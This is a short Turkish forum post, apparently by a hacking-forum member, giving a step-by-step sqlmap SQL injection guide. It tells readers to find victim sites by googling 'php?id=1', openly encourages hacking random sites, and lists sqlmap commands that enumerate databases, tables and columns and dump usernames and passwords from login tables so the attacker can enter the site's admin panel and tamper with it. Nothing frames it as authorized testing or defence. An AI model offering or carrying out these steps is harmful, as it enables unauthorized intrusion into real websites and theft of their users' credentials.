Ultra Üye
LİNUX’DA SQL ENJEKSİYON
1) İlk olarak sitemizde SQL açığı bulunması gerekiyor . Bunun için de googleye '' php?id=1 '' komutunu aratmamız gerekiyor . ( Eğer rastgele bir site hackleyecekseniz bunu yapabilirsiniz . ) Fakat belli bir site varsa elinizdeki siteyi hacklemeyi deneyeceksiniz.
2) Sitemizi seçtikten sonra sitemize girip urlyi kopyalıyoruz .
3) Terminalimizi açtıktan sonra kodumuzu giriyoruz . '' sqlmap -u ' sitenin urlsi ' --dbs '' Bu komut bize uygun databaseleri gösterecektir .
4) Orada önünüze databaseler çıkacaktır . Bunlardan birini seçin fakat ' www ' databasesi çıktıysa
onu seçin.
5) Seçtikten sonra komutu giriyoruz . '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' --tables
'' Bu komut ise bize tableleri gösterir . Önünüze 10'dan fazla gelebilir.
6) Tablelerin arasından ise sonunda ' login ' ve ' users ' olanları not ediyoruz.(Herhangi bir yere)
7) Bizim işimiz login ile . Komutumuzu giriyoruz. '' sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' --columns ''
''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C username --dump ''
9) Bu komuttan sonra usernameyi buluruz. Ve sıra şifrede
''sqlmap -u ' sitenin urlsi ' -D ' seçtiğiniz database ' -T ' tablelerin arasından seçtiğiniz login kodu ' -C password --dump ''
10) Bu komuttan sonra da şifre de bizim elimizde ve artık panele girip site üzerinde oynama yapabiliriz.....
